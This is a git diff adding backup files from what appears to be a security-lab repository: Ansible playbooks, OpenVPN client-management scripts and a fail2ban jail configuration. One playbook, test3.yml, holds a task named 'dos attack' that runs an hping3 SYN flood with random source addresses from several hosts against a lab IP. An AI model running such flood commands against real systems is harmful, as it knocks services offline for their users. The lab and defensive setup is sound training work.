+172.27.0.3 +172.27.0.4 +172.27.0.5 +172.27.0.6 diff --git a/backup_files/test2.yml b/backup_files/test2.yml new file mode 100644 index 0000000..11e6305 --- /dev/null +++ b/backup_files/test2.yml @@ -0,0 +1,48 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + tasks: + + + # ls -al test + +# - name: ls -al +# become: yes +# become_user: "{{ user }}" +# command: ls -al +# ignore_errors: yes +# register: config + +# - name: ls config +# debug: var=config.stdout_lines + + + # transfer script + + - name: Transfer script. + copy: src=script_update.sh dest=/home/docker mode=0777 + + # exec script + - name: Exec script_update. + command: sh /home/docker/script_update.sh + + + # install hping3 + - name: Ansible apt install hping3. + become: true + apt: + name: hping3 + state: present + update_cache: true + + + # refresh + - name: Refresh connection + meta: clear_host_errors + + diff --git a/backup_files/test3.retry b/backup_files/test3.retry new file mode 100644 index 0000000..f23db12 --- /dev/null +++ b/backup_files/test3.retry @@ -0,0 +1,4 @@ +172.29.0.3 +172.29.0.4 +172.29.0.5 +172.29.0.6 diff --git a/backup_files/test3.yml b/backup_files/test3.yml new file mode 100644 index 0000000..c4492c5 --- /dev/null +++ b/backup_files/test3.yml @@ -0,0 +1,60 @@ +--- +- hosts: service + remote_user: docker + sudo: yes + gather_facts: no + vars: + user: "docker" + + + + tasks: + + + + + # ls -al + +# - name: ls -al +# become: yes +# become_user: "{{ user }}" +# command: ls -al +# ignore_errors: yes +# register: config2 + + +# - name: ls config2 +# debug: var=config2.stdout_lines + + # dos attack async + - name: dos attack + command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y + async: 120 + poll: 0 + + + + + # ls -al + +# - name: ls -al +# become: yes +# become_user: "{{ user }}" +# command: ls -al +# ignore_errors: yes +# register: config3 + + + - name: ls config3 + debug: var=config3.stdout_lines + + + + + + + + - name: Refresh connection + meta: clear_host_errors + + diff --git a/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh b/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh new file mode 100755 index 0000000..059cbc2 --- /dev/null +++ b/backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh @@ -0,0 +1,26 @@ +#!/bin/bash +for i in {1..5} +do +#create user + +NUM=$i +USERNAME=sec_vpn_$NUM +vpn_data=$PWD/openvpn-services/ +docker=registry.vlabs.uniwa.gr:5080/myownvpn + +docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass +docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn + +#change file of user ----if needed change ip in here---- +NAME=sec_vpn_$NUM.ovpn +sudo sed -i '5,7d' ./$NAME +sudo sed -i '4 a comp-lzo' ./$NAME +sudo sed -i '5 a resolv-retry infinite' ./$NAME +sudo sed -i '6 a keepalive 15 60' ./$NAME +sudo sed -i '7 a remote-cert-tls server' ./$NAME +sudo sed -i '8 a remote 192.168.1.5 1194 udp' ./$NAME +sudo sed -i '9 a float' ./$NAME +done + +cp sec_vpn_* ../test/project/ + diff --git a/backup_files/vpn+backup/create-user.sh b/backup_files/vpn+backup/create-user.sh new file mode 100755 index 0000000..25652b5 --- /dev/null +++ b/backup_files/vpn+backup/create-user.sh @@ -0,0 +1,6 @@ +USERNAME=sec2 +vpn_data=$PWD/openvpn-services/ +docker=registry.vlabs.uniwa.gr:5080/myownvpn + +docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass +docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn diff --git a/backup_files/vpn+backup/create-vpn.sh b/backup_files/vpn+backup/create-vpn.sh new file mode 100755 index 0000000..7409fd7 --- /dev/null +++ b/backup_files/vpn+backup/create-vpn.sh @@ -0,0 +1,47 @@ +#!/bin/bash +IP=127.0.0.1 # Server IP +P=1194 # Server Port +OVPN_SERVER='10.80.0.0/16' # VPN Network + +#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist ** +vpn_data=$PWD/openvpn-services/ +if [ ! -d $vpn_data ]; then + mkdir -p $vpn_data +fi + +NAME=swarmlab-vpn-services # name of docker service +DOCKERnetwork=swarmlab-vpn-services-network # docker network +docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image + +docker stop $NAME #stop container +sleep 1 +docker container rm $NAME #rm container + +# rm config files +rm -f $vpn_data/openvpn.conf.*.bak +rm -f $vpn_data/openvpn.conf +rm -f $vpn_data/ovpn_env.sh.*.bak +rm -f $vpn_data/ovpn_env.sh + +# create network +sleep 1 +docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork + +#run container see ovpn_genconfig +docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:1194 \ +-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER + +# create pki see ovpn_initpki +docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki + +# see ovpn_copy_server_files +#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files + +#create vpn see --cap-add=NET_ADMIN +sleep 1 +docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker + +sudo sysctl -w net.ipv4.ip_forward=1 + +#show created +docker ps diff --git a/backup_files/vpn+backup/rm-user.sh b/backup_files/vpn+backup/rm-user.sh new file mode 100755 index 0000000..8dccdae --- /dev/null +++ b/backup_files/vpn+backup/rm-user.sh @@ -0,0 +1,22 @@ +#!/bin/bash + +CLIENTNAME=sec_vpn_ +U=$CLIENTNAME + +vpn_data=$PWD/openvpn-services/ +docker=registry.vlabs.uniwa.gr:5080/myownvpn + +rm -f $vpn_data/pki/reqs/$CLIENTNAME.req +rm -f $vpn_data/pki/private/$CLIENTNAME.key +rm -f $vpn_data/pki/issued/$CLIENTNAME.crt +rm -f $vpn_data/server/ccd/$CLIENTNAME +rm -f $vpn_data/ccd/$CLIENTNAME +pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4) + +rm -f $vpn_data/pki/certs_by_serial/$pem.pem +sed -i "/CN=$U$/d" $vpn_data/pki/index.txt +echo $pem +docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove + +rm -f $vpn_data_user_config/$CLIENTNAME.ovpn +rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn diff --git a/backup_files/vpn+backup/rm_my5.sh b/backup_files/vpn+backup/rm_my5.sh new file mode 100755 index 0000000..3c3ec14 --- /dev/null +++ b/backup_files/vpn+backup/rm_my5.sh @@ -0,0 +1,30 @@ +#!/bin/bash +for i in {1..5} +do +#delete my 5 + +NUM=$i +CLIENTNAME=sec_vpn_$NUM +U=$CLIENTNAME + +vpn_data=$PWD/openvpn-services/ +docker=registry.vlabs.uniwa.gr:5080/myownvpn + +rm -f $vpn_data/pki/reqs/$CLIENTNAME.req +rm -f $vpn_data/pki/private/$CLIENTNAME.key +rm -f $vpn_data/pki/issued/$CLIENTNAME.crt +rm -f $vpn_data/server/ccd/$CLIENTNAME +rm -f $vpn_data/ccd/$CLIENTNAME +pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4) + +rm -f $vpn_data/pki/certs_by_serial/$pem.pem +sed -i "/CN=$U$/d" $vpn_data/pki/index.txt +echo $pem +docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove + +rm -f $vpn_data_user_config/$CLIENTNAME.ovpn +rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn + +#rm file from myfile +sudo rm ./$CLIENTNAME.ovpn +done diff --git a/backup_files/vpn+backup/show-conn-user.sh b/backup_files/vpn+backup/show-conn-user.sh new file mode 100755 index 0000000..5e20b50 --- /dev/null +++ b/backup_files/vpn+backup/show-conn-user.sh @@ -0,0 +1,2 @@ +NAME=swarmlab-vpn-services # name of docker service +docker exec -it $NAME ovpn_listclients diff --git a/backup_files/vpn+backup/show-user.sh b/backup_files/vpn+backup/show-user.sh new file mode 100755 index 0000000..5e20b50 --- /dev/null +++ b/backup_files/vpn+backup/show-user.sh @@ -0,0 +1,2 @@ +NAME=swarmlab-vpn-services # name of docker service +docker exec -it $NAME ovpn_listclients diff --git a/backup_files/vpn+backup/vi-userfile.sh b/backup_files/vpn+backup/vi-userfile.sh new file mode 100755 index 0000000..efe2f59 --- /dev/null +++ b/backup_files/vpn+backup/vi-userfile.sh @@ -0,0 +1,16 @@ +#!/bin/bash +for j in {1..5} +do +NAME=sec_vpn_$j.ovpn +sudo sed -i '5,7d' /home/zoiros13/swarmlab-sec/vpn/$NAME +sudo sed -i '4 a comp-lzo' /home/zoiros13/swarmlab-sec/vpn/$NAME +sudo sed -i '5 a resolv-retry infinite' /home/zoiros13/swarmlab-sec/vpn/$NAME +sudo sed -i '6 a keepalive 15 60' /home/zoiros13/swarmlab-sec/vpn/$NAME +sudo sed -i '7 a remote-cert-tls server' /home/zoiros13/swarmlab-sec/vpn/$NAME +sudo sed -i '8 a remote 192.168.1.5 1194 udp' /home/zoiros13/swarmlab-sec/vpn/$NAME +sudo sed -i '9 a float' /home/zoiros13/swarmlab-sec/vpn/$NAME +done + + + + diff --git a/backup_files/workingjail.local b/backup_files/workingjail.local new file mode 100644 index 0000000..9663f0f --- /dev/null +++ b/backup_files/workingjail.local @@ -0,0 +1,899 @@ +# +# WARNING: heavily refactored in 0.9.0 release. Please review and +# customize settings for your setup. +# +# Changes: in most of the cases you should not modify this +# file, but provide customizations in jail.local file, +# or separate .conf files under jail.d/ directory, e.g.: +# +# HOW TO ACTIVATE JAILS: +# +# YOU SHOULD NOT MODIFY THIS FILE. +# +# It will probably be overwritten or improved in a distribution update. +# +# Provide customizations in a jail.local file or a jail.d/customisation.local. +# For example to change the default bantime for all jails and to enable the +# ssh-iptables jail the following (uncommented) would appear in the .local file. +# See man 5 jail.conf for details. +# +# [DEFAULT] +# bantime = 1h +# +# [sshd] +# enabled = true +# +# See jail.conf(5) man page for more information + + + +# Comments: use '#' for comment lines and ';' (following a space) for inline comments + + +[INCLUDES] + +#before = paths-distro.conf +before = paths-debian.conf + +# The DEFAULT allows a global definition of the options. They can be overridden +# in each jail afterwards. + +[DEFAULT] + +# +# MISCELLANEOUS OPTIONS +# + +# "ignorself" specifies whether the local resp. own IP addresses should be ignored +# (default is true). Fail2ban will not ban a host which matches such addresses. +#ignorself = true + +# "ignoreip" can be a list of IP addresses, CIDR masks or DNS hosts. Fail2ban +# will not ban a host which matches an address in this list. Several addresses +# can be defined using space (and/or comma) separator. +#ignoreip = 127.0.0.1/8 ::1 + +# External command that will take an tagged arguments to ignore, e.g. , +# and return true if the IP is to be ignored. False otherwise. +# +# ignorecommand = /path/to/command +ignorecommand = + +# "bantime" is the number of seconds that a host is banned. +bantime = 600 + +# A host is banned if it has generated "maxretry" during the last "findtime" +# seconds. +findtime = 30 + +# "maxretry" is the number of failures before a host get banned. +maxretry = 5 + +# "backend" specifies the backend used to get files modification. +# Available options are "pyinotify", "gamin", "polling", "systemd" and "auto". +# This option can be overridden in each jail as well. +# +# pyinotify: requires pyinotify (a file alteration monitor) to be installed. +# If pyinotify is not installed, Fail2ban will use auto. +# gamin: requires Gamin (a file alteration monitor) to be installed. +# If Gamin is not installed, Fail2ban will use auto. +# polling: uses a polling algorithm which does not require external libraries. +# systemd: uses systemd python library to access the systemd journal. +# Specifying "logpath" is not valid for this backend. +# See "journalmatch" in the jails associated filter config +# auto: will try to use the following backends, in order: +# pyinotify, gamin, polling. +# +# Note: if systemd backend is chosen as the default but you enable a jail +# for which logs are present only in its own log files, specify some other +# backend for that jail (e.g. polling) and provide empty value for +# journalmatch. See https://github.com/fail2ban/fail2ban/issues/959#issuecomment-74901200 +backend = auto + +# "usedns" specifies if jails should trust hostnames in logs, +# warn when DNS lookups are performed, or ignore all hostnames in logs +# +# yes: if a hostname is encountered, a DNS lookup will be performed. +# warn: if a hostname is encountered, a DNS lookup will be performed, +# but it will be logged as a warning. +# no: if a hostname is encountered, will not be used for banning, +# but it will be logged as info. +# raw: use raw value (no hostname), allow use it for no-host filters/actions (example user) +usedns = warn + +# "logencoding" specifies the encoding of the log files handled by the jail +# This is used to decode the lines from the log file. +# Typical examples: "ascii", "utf-8" +# +# auto: will use the system locale setting +logencoding = auto + +# "enabled" enables the jails. +# By default all jails are disabled, and it should stay this way. +# Enable only relevant to your setup jails in your .local or jail.d/*.conf +# +# true: jail will be enabled and log files will get monitored for changes +# false: jail is not enabled +enabled = false + + +# "mode" defines the mode of the filter (see corresponding filter implementation for more info). +mode = normal + +# "filter" defines the filter to use by the jail. +# By default jails have names matching their filter name +# +filter = %(__name__)s[mode=%(mode)s] + + +# +# ACTIONS +# + +# Some options used for actions + +# Destination email address used solely for the interpolations in +# jail.{conf,local,d/*} configuration files. +destemail = root@localhost + +# Sender email address used solely for some actions +sender = root@ + +# E-mail action. Since 0.8.1 Fail2Ban uses sendmail MTA for the +# mailing. Change mta configuration parameter to mail if you want to +# revert to conventional 'mail'. +mta = sendmail + +# Default protocol +protocol = tcp + +# Specify chain where jumps would need to be added in ban-actions expecting parameter chain +chain = + +# Ports to be banned +# Usually should be overridden in a particular jail +port = 0:65535 + +# Format of user-agent https://tools.ietf.org/html/rfc7231#section-5.5.3 +fail2ban_agent = Fail2Ban/%(fail2ban_version)s + +# +# Action shortcuts. To be used to define action parameter + +# Default banning action (e.g. iptables, iptables-new, +# iptables-multiport, shorewall, etc) It is used to define +# action_* variables. Can be overridden globally or per +# section within jail.local file +banaction = iptables-multiport +banaction_allports = iptables-allports + + + + +# The simplest action to take: ban only +#action_ = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + +# ban & send an e-mail with whois report to the destemail. +action_mw = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + %(mta)s-whois[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", protocol="%(protocol)s", chain="%(chain)s"] + +# ban & send an e-mail with whois report and relevant log lines +# to the destemail. +action_mwl = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + %(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"] + +# See the IMPORTANT note in action.d/xarf-login-attack for when to use this action +# +# ban & send a xarf e-mail to abuse contact of IP address and include relevant log lines +# to the destemail. +action_xarf = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + xarf-login-attack[service=%(__name__)s, sender="%(sender)s", logpath=%(logpath)s, port="%(port)s"] + +# ban IP on CloudFlare & send an e-mail with whois report and relevant log lines +# to the destemail. +action_cf_mwl = cloudflare[cfuser="%(cfemail)s", cftoken="%(cfapikey)s"] + %(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"] + +# Report block via blocklist.de fail2ban reporting service API +# +# See the IMPORTANT note in action.d/blocklist_de.conf for when to use this action. +# Specify expected parameters in file action.d/blocklist_de.local or if the interpolation +# `action_blocklist_de` used for the action, set value of `blocklist_de_apikey` +# in your `jail.local` globally (section [DEFAULT]) or per specific jail section (resp. in +# corresponding jail.d/my-jail.local file). +# +action_blocklist_de = blocklist_de[email="%(sender)s", service=%(filter)s, apikey="%(blocklist_de_apikey)s", agent="%(fail2ban_agent)s"] + +# Report ban via badips.com, and use as blacklist +# +# See BadIPsAction docstring in config/action.d/badips.py for +# documentation for this action. +# +# NOTE: This action relies on banaction being present on start and therefore +# should be last action defined for a jail. +# +action_badips = badips.py[category="%(__name__)s", banaction="%(banaction)s", agent="%(fail2ban_agent)s"] +# +# Report ban via badips.com (uses action.d/badips.conf for reporting only) +# +action_badips_report = badips[category="%(__name__)s", agent="%(fail2ban_agent)s"] + +# Report ban via abuseipdb.com. +# +# See action.d/abuseipdb.conf for usage example and details. +# +action_abuseipdb = abuseipdb + +# Choose default action. To change, just override value of 'action' with the +# interpolation to the chosen action shortcut (e.g. action_mw, action_mwl, etc) in jail.local +# globally (section [DEFAULT]) or per specific section +action = %(action_)s + + +# +# JAILS +# + +# +# SSH servers +# + +[sshd] +enabled = true +maxretry = 3 +bantime = 300 +findtime = 30 +# To use more aggressive sshd modes set filter parameter "mode" in jail.local: +# normal (default), ddos, extra or aggressive (combines all). +# See "tests/files/logs/sshd" or "filter.d/sshd.conf" for usage example and details. +#mode = normal +chain= INPUT +port = 22 +logpath = %(sshd_log)s +backend = %(sshd_backend)s +action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"] + + + +[dropbear] + +port = ssh +logpath = %(dropbear_log)s +backend = %(dropbear_backend)s + + +[selinux-ssh] + +port = ssh +logpath = %(auditd_log)s +enabled = true + +# +# HTTP servers +# + +[apache-auth] + +port = http,https +logpath = %(apache_error_log)s + + +[apache-badbots] +# Ban hosts which agent identifies spammer robots crawling the web +# for email addresses. The mail outputs are buffered. +port = http,https +logpath = %(apache_access_log)s +bantime = 48h +maxretry = 1 + + +[apache-noscript] + +port = http,https +logpath = %(apache_error_log)s + + +[apache-overflows] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-nohome] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-botsearch] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-fakegooglebot] + +port = http,https +logpath = %(apache_access_log)s +maxretry = 1 +ignorecommand = %(ignorecommands_dir)s/apache-fakegooglebot + + +[apache-modsecurity] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 2 + + +[apache-shellshock] + +port = http,https +logpath = %(apache_error_log)s +maxretry = 1 + + +[openhab-auth] + +filter = openhab +action = iptables-allports[name=NoAuthFailures] +logpath = /opt/openhab/logs/request.log + + +[nginx-http-auth] + +port = http,https +logpath = %(nginx_error_log)s + +# To use 'nginx-limit-req' jail you should have `ngx_http_limit_req_module` +# and define `limit_req` and `limit_req_zone` as described in nginx documentation +# http://nginx.org/en/docs/http/ngx_http_limit_req_module.html +# or for example see in 'config/filter.d/nginx-limit-req.conf' +[nginx-limit-req] +port = http,https +logpath = %(nginx_error_log)s + +[nginx-botsearch] + +port = http,https +logpath = %(nginx_error_log)s +maxretry = 2 + + +# Ban attackers that try to use PHP's URL-fopen() functionality +# through GET/POST variables. - Experimental, with more than a year +# of usage in production environments. + +[php-url-fopen] + +port = http,https +logpath = %(nginx_access_log)s + %(apache_access_log)s + + +[suhosin] + +port = http,https +logpath = %(suhosin_log)s + + +[lighttpd-auth] +# Same as above for Apache's mod_auth +# It catches wrong authentifications +port = http,https +logpath = %(lighttpd_error_log)s + + +# +# Webmail and groupware servers +# + +[roundcube-auth] + +port = http,https +logpath = %(roundcube_errors_log)s +# Use following line in your jail.local if roundcube logs to journal. +#backend = %(syslog_backend)s + + +[openwebmail] + +port = http,https +logpath = /var/log/openwebmail.log + + +[horde] + +port = http,https +logpath = /var/log/horde/horde.log + + +[groupoffice] + +port = http,https +logpath = /home/groupoffice/log/info.log + + +[sogo-auth] +# Monitor SOGo groupware server +# without proxy this would be: +# port = 20000 +port = http,https +logpath = /var/log/sogo/sogo.log + + +[tine20] + +logpath = /var/log/tine20/tine20.log +port = http,https + + +# +# Web Applications +# +# + +[drupal-auth] + +port = http,https +logpath = %(syslog_daemon)s +backend = %(syslog_backend)s + +[guacamole] + +port = http,https +logpath = /var/log/tomcat*/catalina.out + +[monit] +#Ban clients brute-forcing the monit gui login +port = 2812 +logpath = /var/log/monit + + +[webmin-auth] + +port = 10000 +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +[froxlor-auth] + +port = http,https +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +# +# HTTP Proxy servers +# +# + +[squid] + +port = 80,443,3128,8080 +logpath = /var/log/squid/access.log + + +[3proxy] + +port = 3128 +logpath = /var/log/3proxy.log + + +# +# FTP servers +# + + +[proftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(proftpd_log)s +backend = %(proftpd_backend)s + + +[pure-ftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(pureftpd_log)s +backend = %(pureftpd_backend)s + + +[gssftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(syslog_daemon)s +backend = %(syslog_backend)s + + +[wuftpd] + +port = ftp,ftp-data,ftps,ftps-data +logpath = %(wuftpd_log)s +backend = %(wuftpd_backend)s + + +[vsftpd] +# or overwrite it in jails.local to be +# logpath = %(syslog_authpriv)s +# if you want to rely on PAM failed login attempts +# vsftpd's failregex should match both of those formats +port = ftp,ftp-data,ftps,ftps-data +logpath = %(vsftpd_log)s + + +# +# Mail servers +# + +# ASSP SMTP Proxy Jail +[assp] + +port = smtp,465,submission +logpath = /root/path/to/assp/logs/maillog.txt + + +[courier-smtp] + +port = smtp,465,submission +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[postfix] +# To use another modes set filter parameter "mode" in jail.local: +mode = more +port = smtp,465,submission +logpath = %(postfix_log)s +backend = %(postfix_backend)s + + +[postfix-rbl] + +filter = postfix[mode=rbl] +port = smtp,465,submission +logpath = %(postfix_log)s +backend = %(postfix_backend)s +maxretry = 1 + + +[sendmail-auth] + +port = submission,465,smtp +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[sendmail-reject] +# To use more aggressive modes set filter parameter "mode" in jail.local: +# normal (default), extra or aggressive +# See "tests/files/logs/sendmail-reject" or "filter.d/sendmail-reject.conf" for usage example and details. +#mode = normal +port = smtp,465,submission +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[qmail-rbl] + +filter = qmail +port = smtp,465,submission +logpath = /service/qmail/log/main/current + + +# dovecot defaults to logging to the mail syslog facility +# but can be set by syslog_facility in the dovecot configuration. +[dovecot] + +port = pop3,pop3s,imap,imaps,submission,465,sieve +logpath = %(dovecot_log)s +backend = %(dovecot_backend)s + + +[sieve] + +port = smtp,465,submission +logpath = %(dovecot_log)s +backend = %(dovecot_backend)s + + +[solid-pop3d] + +port = pop3,pop3s +logpath = %(solidpop3d_log)s + + +[exim] +# see filter.d/exim.conf for further modes supported from filter: +#mode = normal +port = smtp,465,submission +logpath = %(exim_main_log)s + + +[exim-spam] + +port = smtp,465,submission +logpath = %(exim_main_log)s + + +[kerio] + +port = imap,smtp,imaps,465 +logpath = /opt/kerio/mailserver/store/logs/security.log + + +# +# Mail servers authenticators: might be used for smtp,ftp,imap servers, so +# all relevant ports get banned +# + +[courier-auth] + +port = smtp,465,submission,imap,imaps,pop3,pop3s +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[postfix-sasl] + +filter = postfix[mode=auth] +port = smtp,465,submission,imap,imaps,pop3,pop3s +# You might consider monitoring /var/log/mail.warn instead if you are +# running postfix since it would provide the same log lines at the +# "warn" level but overall at the smaller filesize. +logpath = %(postfix_log)s +backend = %(postfix_backend)s + + +[perdition] + +port = imap,imaps,pop3,pop3s +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[squirrelmail] + +port = smtp,465,submission,imap,imap2,imaps,pop3,pop3s,http,https,socks +logpath = /var/lib/squirrelmail/prefs/squirrelmail_access_log + + +[cyrus-imap] + +port = imap,imaps +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +[uwimap-auth] + +port = imap,imaps +logpath = %(syslog_mail)s +backend = %(syslog_backend)s + + +# +# +# DNS servers +# + + +# !!! WARNING !!! +# Since UDP is connection-less protocol, spoofing of IP and imitation +# of illegal actions is way too simple. Thus enabling of this filter +# might provide an easy way for implementing a DoS against a chosen +# victim. See +# http://nion.modprobe.de/blog/archives/690-fail2ban-+-dns-fail.html +# Please DO NOT USE this jail unless you know what you are doing. +# +# IMPORTANT: see filter.d/named-refused for instructions to enable logging +# This jail blocks UDP traffic for DNS requests. +# [named-refused-udp] +# +# filter = named-refused +# port = domain,953 +# protocol = udp +# logpath = /var/log/named/security.log + +# IMPORTANT: see filter.d/named-refused for instructions to enable logging +# This jail blocks TCP traffic for DNS requests. + +[named-refused] + +port = domain,953 +logpath = /var/log/named/security.log + + +[nsd] + +port = 53 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] +logpath = /var/log/nsd.log + + +# +# Miscellaneous +# + +[asterisk] + +port = 5060,5061 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] + %(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"] +logpath = /var/log/asterisk/messages +maxretry = 10 + + +[freeswitch] + +port = 5060,5061 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] + %(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"] +logpath = /var/log/freeswitch.log +maxretry = 10 + + +# To log wrong MySQL access attempts add to /etc/my.cnf in [mysqld] or +# equivalent section: +# log-warning = 2 +# +# for syslog (daemon facility) +# [mysqld_safe] +# syslog +# +# for own logfile +# [mysqld] +# log-error=/var/log/mysqld.log +[mysqld-auth] + +port = 3306 +logpath = %(mysql_log)s +backend = %(mysql_backend)s + + +# Log wrong MongoDB auth (for details see filter 'filter.d/mongodb-auth.conf') +[mongodb-auth] +# change port when running with "--shardsvr" or "--configsvr" runtime operation +port = 27017 +logpath = /var/log/mongodb/mongodb.log + + +# Jail for more extended banning of persistent abusers +# !!! WARNINGS !!! +# 1. Make sure that your loglevel specified in fail2ban.conf/.local +# is not at DEBUG level -- which might then cause fail2ban to fall into +# an infinite loop constantly feeding itself with non-informative lines +# 2. Increase dbpurgeage defined in fail2ban.conf to e.g. 648000 (7.5 days) +# to maintain entries for failed logins for sufficient amount of time +[recidive] + +logpath = /var/log/fail2ban.log +banaction = %(banaction_allports)s +bantime = 1w +findtime = 1d + + +# Generic filter for PAM. Has to be used with action which bans all +# ports such as iptables-allports, shorewall + +[pam-generic] +# pam-generic filter can be customized to monitor specific subset of 'tty's +banaction = %(banaction_allports)s +logpath = %(syslog_authpriv)s +backend = %(syslog_backend)s + + +[xinetd-fail] + +banaction = iptables-multiport-log +logpath = %(syslog_daemon)s +backend = %(syslog_backend)s +maxretry = 2 + + +# stunnel - need to set port for this +[stunnel] + +logpath = /var/log/stunnel4/stunnel.log + + +[ejabberd-auth] + +port = 5222 +logpath = /var/log/ejabberd/ejabberd.log + + +[counter-strike] + +logpath = /opt/cstrike/logs/L[0-9]*.log +# Firewall: http://www.cstrike-planet.com/faq/6 +tcpport = 27030,27031,27032,27033,27034,27035,27036,27037,27038,27039 +udpport = 1200,27000,27001,27002,27003,27004,27005,27006,27007,27008,27009,27010,27011,27012,27013,27014,27015 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(tcpport)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(udpport)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp] + +# consider low maxretry and a long bantime +# nobody except your own Nagios server should ever probe nrpe +[nagios] + +logpath = %(syslog_daemon)s ; nrpe.cfg may define a different log_facility +backend = %(syslog_backend)s +maxretry = 1 + + +[oracleims] +# see "oracleims" filter file for configuration requirement for Oracle IMS v6 and above +logpath = /opt/sun/comms/messaging64/log/mail.log_current +banaction = %(banaction_allports)s + +[directadmin] +logpath = /var/log/directadmin/login.log +port = 2222 + +[portsentry] +logpath = /var/lib/portsentry/portsentry.history +maxretry = 1 + +[pass2allow-ftp] +# this pass2allow example allows FTP traffic after successful HTTP authentication +port = ftp,ftp-data,ftps,ftps-data +# knocking_url variable must be overridden to some secret value in jail.local +knocking_url = /knocking/ +filter = apache-pass[knocking_url="%(knocking_url)s"] +# access log of the website with HTTP auth +logpath = %(apache_access_log)s +blocktype = RETURN +returntype = DROP +action = %(action_)s[blocktype=%(blocktype)s, returntype=%(returntype)s] +bantime = 1h +maxretry = 1 +findtime = 1 + + +[murmur] +# AKA mumble-server +port = 64738 +action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol=tcp, chain="%(chain)s", actname=%(banaction)s-tcp] + %(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol=udp, chain="%(chain)s", actname=%(banaction)s-udp] +logpath = /var/log/mumble-server/mumble-server.log + + +[screensharingd] +# For Mac OS Screen Sharing Service (VNC) +logpath = /var/log/system.log +logencoding = utf-8 + +[haproxy-http-auth] +# HAProxy by default doesn't log to file you'll need to set it up to forward +# logs to a syslog server which would then write them to disk. +# See "haproxy-http-auth" filter for a brief cautionary note when setting +# maxretry and findtime. +logpath = /var/log/haproxy.log + +[slapd] +port = ldap,ldaps +logpath = /var/log/slapd.log + +[domino-smtp] +port = smtp,ssmtp +logpath = 